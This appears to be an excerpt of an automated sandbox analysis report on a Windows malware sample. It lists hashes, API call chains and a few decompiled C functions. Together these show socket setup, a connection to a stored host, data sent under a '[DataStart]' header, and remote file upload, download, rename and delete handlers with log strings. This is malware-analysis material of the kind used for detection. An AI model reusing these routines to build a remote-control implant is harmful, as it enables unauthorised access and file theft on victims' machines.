                                  • Opcode Fuzzy Hash: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                  • String ID:
                                  • API String ID: 868658090-0
                                  • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                  • Opcode Fuzzy Hash: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00402038(intOrPtr* __ecx) {
                                  				intOrPtr _t6;
                                  				intOrPtr* _t9;
                                  
                                  				_t9 = __ecx;
                                  				if( *0x41b730 != 0) {
                                  					L2:
                                  					_push(6);
                                  					_push(1);
                                  					_push(0); // executed
                                  					L0041418E(); // executed
                                  					 *_t9 = _t6;
                                  					if(_t6 != 0xffffffff) {
                                  						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
                                  						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
                                  						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
                                  						return _t6;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					_t6 = E00402074(); // executed
                                  					if(_t6 == 0) {
                                  						L3:
                                  						return 0;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startupsocket
                                  • String ID:
                                  • API String ID: 3996037109-0
                                  • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                  • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 16%
                                  			E0040209B(intOrPtr* __ecx, void* _a4) {
                                  				signed int _t3;
                                  
                                  				_t1 = __ecx + 4; // 0x41be74
                                  				_t3 = _t1;
                                  				_push(0x10);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_push(_t3);
                                  				_push( *__ecx);
                                  				asm("movsd"); // executed
                                  				L0041419A(); // executed
                                  				asm("sbb al, al");
                                  				return  ~_t3 + 1;
                                  			}


                                  APIs
                                  • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: connect
                                  • String ID:
                                  • API String ID: 1959786783-0
                                  • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                  • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00402074() {
                                  				char _v404;
                                  				signed int _t2;
                                  				char _t4;
                                  
                                  				_t2 =  &_v404;
                                  				_push(_t2);
                                  				_push(0x202); // executed
                                  				L00414194(); // executed
                                  				asm("sbb al, al");
                                  				_t4 =  ~_t2 + 1;
                                  				 *0x41b730 = _t4;
                                  				return _t4;
                                  			}


                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                  • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                  • SetEvent.KERNEL32(?), ref: 00403C69
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00403C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                    • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                    • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                  • atoi.MSVCRT ref: 004041A0
                                    • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                    • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                    • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                    • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                    • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                    • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                    • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                    • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                    • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                  • closesocket.WS2_32(?), ref: 0040433A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                  • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6B015DF8,00000001,00000000), ref: 00404489
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                  • _wrename.MSVCRT ref: 004044C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                  • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
